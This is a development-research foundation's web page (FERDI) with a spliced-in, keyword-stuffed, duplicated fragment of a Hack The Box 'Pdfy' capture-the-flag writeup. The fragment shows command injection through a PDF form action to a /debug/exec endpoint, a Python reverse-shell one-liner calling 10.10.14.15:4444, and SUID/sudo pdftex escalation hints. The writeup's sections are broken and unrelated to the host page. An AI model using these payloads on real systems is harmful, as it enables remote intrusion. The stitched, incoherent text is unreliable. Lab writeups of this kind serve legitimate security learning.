New ideas about development

Independent and not-for-profit, the Foundation for studies and Research on International Development (FERDI) proposes relevant and innovative thinking on the key issues in development economics.

Find out more
Financement des biens publics mondiaux et financement du développement : quelles règles d’allocation pour quelles finalités ?

Pdfy Htb Writeup Upd May 2026

The writeup follows a logical, phase-based approach:

Each section is broken into “Command → Explanation → Expected Output”, making it easy to follow without blindly copy-pasting. The author also adds “Why this works” callouts — for example, explaining how exiftool can embed malicious JavaScript into PDF metadata that gets executed by the server’s PDF parser.

Minor critique: The writeup could use more screenshots of the web interface, especially the PDF upload/generation page. A few diagrams of the privilege escalation flow would also help visual learners.

nmap -sC -sV -oA pdfy 10.10.11.xx

Ports open:

The internal API has a /debug/exec endpoint (found via fuzzing).

Command injection via PDF:

Create a PDF with an HTTP POST request to http://127.0.0.1:5000/debug/exec with JSON body:

"cmd": "id"

Embed this as a PDF form submission action.

Upload → server executes id and returns output embedded in PNG comment.

Get reverse shell:

"cmd": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'"

Listener catches shell as www-data.

Mitigation:

Pdfy HTB Writeup

Introduction

Pdfy is a medium-level difficulty box on Hack The Box (HTB), an online platform for cybersecurity enthusiasts to practice their skills in a legal and safe environment. The goal of this writeup is to provide a detailed walkthrough of how to exploit the Pdfy box and gain root access.

Initial Reconnaissance

The first step in exploiting any box on HTB is to perform initial reconnaissance. This involves gathering information about the target system, including its IP address, open ports, and services.

$ nmap -sV -p- 10.10.11.206
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-09 14:30 EDT
Nmap scan report for 10.10.11.206
Host is up (0.052s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.33 ((Ubuntu))
111/tcp  open  rpcbind 2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.6.25 (Ubuntu)
445/tcp  open  microsoft-ds Samba smbd 3.6.25 (Ubuntu)
5000/tcp open  upnp    MiniUPnPd 1.12
8080/tcp open  http    Apache httpd 2.4.33 ((Ubuntu))

The scan reveals that the target system has several open ports, including:

Enumeration

The next step is to enumerate the services running on these ports to gather more information about the system.

find / -perm -4000 2>/dev/null

Look for pdftex or tex. If pdftex is SUID root or you can run it as sudo, exploit it. pdfy htb writeup upd

Check sudo rights:

sudo -l

You might see:

(ALL) NOPASSWD: /usr/bin/pdftex
  • Example LFI payloads:
    • All events
    Mine - Visuel formation Partage de la rente minière
    Chair in Strategic Resource Governance: Macroeconomics and Geopolitics
    Chaire
    The Chair in Strategic Resource Governance, Macroeconomics and Geopolitics has recently been launched. Grégoire Rota Graziosi and Rabah Arezki are serving as co-chairs. >> Find out more here. 
    05 May 2026
    The 2026 research conference on development banking - An event featured on the G7 calendar
    Agenda, 20-22 May 2026
    Conference in Partnership with the Clermont International Development Hub (Clermont-Ferrand, 20–22 May 2026) 
    07 May 2026
    Pan-African Project to Support Geological Sciences and Technologies (PanAfGeo+)
    Project
    As part of the PanAfGeo+ programme, FERDI draws on its expertise to support mining investment policies and to train public sector stakeholders in the Democratic Republic of the Congo.
    30 April 2026
    Edito du 30 avril 2026
    G7 Development: putting the allocation of concessional resources back at the top of the agenda
    As the G7 Development Ministerial Meeting takes place in Paris on 29 and 30 April 2026, one question stands out with renewed urgency: to whom should concessional resources – now scarcer and more in demand than ever – be allocated as a priority?
    30 April 2026

    Latest publications

    All publications
    Three partnership priorities for building productive, resilient, and sustainable agri-food systems in Africa
    By Vianney DEQUIEDT, Audrey-Anne DE UBEDA, Andrea DSOUZA, Jean-Marc GRAVELLINI
    May 05, 2026
    G7 Development: putting the allocation of concessional resources back at the top of the agenda
    April 30, 2026
    Critical Minerals, Critical Taxation
    By Grégoire ROTA-GRAZIOSI
    April 29, 2026
    Allocation of concessional resources for development and global public goods. Ten questions and principles for the G7, based on FERDI’s works
    April 28, 2026
    Does Climate Change Vulnerability Matter for the Allocation of Adaptation Finance? An Empirical Analysis of Donors and Instruments over the Period 2019–2023
    By Sosso FEINDOUNO
    April 23, 2026
    Unravelling the nexus between exchange rate undervaluation and global value chains participation
    By Mariz ABDOU, Ibrahim ELBADAWI, Patrick PLANE, Chahir ZAKI
    April 20, 2026

    Events

    All events

    Chairs

    List of chaires

    Created in 2022 the Chair "International Architecture of Development Finance" analyses the reforms needed to modernise the global financial architecture.  

    Find out more

    IHEDD Training courses

    The Institute for Advanced Studies in Sustainable Development (IHEDD) is the training division of the Foundation for Studies and Research on International Development (Ferdi), a recognized provider of professional training. IHEDD’s mission is to train stakeholders involved in development projects and public policies, drawing on academic expertise and in-depth knowledge of field realities.

    All courses

    Courses calendar

    The writeup follows a logical, phase-based approach:

    Each section is broken into “Command → Explanation → Expected Output”, making it easy to follow without blindly copy-pasting. The author also adds “Why this works” callouts — for example, explaining how exiftool can embed malicious JavaScript into PDF metadata that gets executed by the server’s PDF parser.

    Minor critique: The writeup could use more screenshots of the web interface, especially the PDF upload/generation page. A few diagrams of the privilege escalation flow would also help visual learners.

    nmap -sC -sV -oA pdfy 10.10.11.xx

    Ports open:

    The internal API has a /debug/exec endpoint (found via fuzzing).

    Command injection via PDF:

    Create a PDF with an HTTP POST request to http://127.0.0.1:5000/debug/exec with JSON body:

    "cmd": "id"

    Embed this as a PDF form submission action.

    Upload → server executes id and returns output embedded in PNG comment.

    Get reverse shell:

    "cmd": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'"

    Listener catches shell as www-data.

    Mitigation:

    Pdfy HTB Writeup

    Introduction

    Pdfy is a medium-level difficulty box on Hack The Box (HTB), an online platform for cybersecurity enthusiasts to practice their skills in a legal and safe environment. The goal of this writeup is to provide a detailed walkthrough of how to exploit the Pdfy box and gain root access.

    Initial Reconnaissance

    The first step in exploiting any box on HTB is to perform initial reconnaissance. This involves gathering information about the target system, including its IP address, open ports, and services.

    $ nmap -sV -p- 10.10.11.206
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-09 14:30 EDT
Nmap scan report for 10.10.11.206
Host is up (0.052s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.33 ((Ubuntu))
111/tcp  open  rpcbind 2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.6.25 (Ubuntu)
445/tcp  open  microsoft-ds Samba smbd 3.6.25 (Ubuntu)
5000/tcp open  upnp    MiniUPnPd 1.12
8080/tcp open  http    Apache httpd 2.4.33 ((Ubuntu))

    The scan reveals that the target system has several open ports, including:

    Enumeration

    The next step is to enumerate the services running on these ports to gather more information about the system.

    find / -perm -4000 2>/dev/null

    Look for pdftex or tex. If pdftex is SUID root or you can run it as sudo, exploit it.

    Check sudo rights:

    sudo -l

    You might see:

    (ALL) NOPASSWD: /usr/bin/pdftex
  • Example LFI payloads:

    • Blogs

    Entreprenante Afrique
    Visit the blog
    Elsewhere on the Web
    63 boulevard François-Mitterrand, CS 50320
    63009 Clermont-Ferrand Cedex
    France
    Téléphone :
    Contact us
    Programmes
    Chaires
    pdfy htb writeup updpdfy htb writeup updpdfy htb writeup upd
    A foundation recognised to be of public utility by the French state by a decree in 2003.

    © 2026 Southern Hollow